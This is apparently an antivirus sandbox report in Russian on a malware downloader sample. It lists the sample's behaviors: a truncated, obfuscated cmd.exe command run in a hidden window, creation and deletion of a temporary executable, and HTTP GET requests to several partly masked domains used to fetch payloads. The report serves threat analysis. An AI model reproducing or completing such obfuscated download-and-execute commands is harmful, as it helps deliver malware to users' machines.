Техническая информация
Вредоносные функции
Загружает файлы и запускает на исполнение.
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\cmd.exe' /c cMd /v:on /R "set _~?=__/-\//_-\\_/\- _/-\_/\/\__\--- -/\///_-_--_\_\ //\\_\_/-\_-_-- //\\\_\-_--_/_/ /_\-\/-\--\/___ \_/--_/--\//\_\ /_\-/_-\\//\-_- __\__\\/\-/---/ _//-_-/...
Изменения в файловой системе
Создает следующие файлы
- %TEMP%\88.exe
Удаляет следующие файлы
- %TEMP%\88.exe
Сетевая активность
Подключается к
- 'de#########ering.users31.interdns.co.uk':80
- 'd-#a.cz':80
- 'dv##i509.ru':80
- 'dv##i509.ru':443
- 'du##e.at':80
TCP
Запросы HTTP GET
- http://de#########ering.users31.interdns.co.uk/KepZJXT
- http://d-#a.cz/ZVjGOE9
- http://ww##.d-va.cz/
- http://dv##i509.ru/y1
- http://www.du##e.at/rFQA
- http://du##e.at/rFQA
Другие
- 'dv##i509.ru':443
UDP
- DNS ASK de#########ering.users31.interdns.co.uk
- DNS ASK d-#a.cz
- DNS ASK ww##.d-va.cz
- DNS ASK dv##i509.ru
- DNS ASK du##e.at
- DNS ASK cl######econsultingltd.com
Другое
Создает и запускает на исполнение
- '<SYSTEM32>\cmd.exe' /c cMd /v:on /R "set _~?=__/-\//_-\\_/\- _/-\_/\/\__\--- -/\///_-_--_\_\ //\\_\_/-\_-_-- //\\\_\-_--_/_/ /_\-\/-\--\/___ \_/--_/--\//\_\ /_\-/_-\\//\-_- __\__\\/\-/---/ _//-_-/...' (со скрытым окном)
Запускает на исполнение
- '<SYSTEM32>\cmd.exe' /v:on /R "set _~?=__/-\//_-\\_/\- _/-\_/\/\__\--- -/\///_-_--_\_\ //\\_\_/-\_-_-- //\\\_\-_--_/_/ /_\-\/-\--\/___ \_/--_/--\//\_\ /_\-/_-\\//\-_- __\__\\/\-/---/ _//-_-/--/_\\\\ \_/_---_\//-...
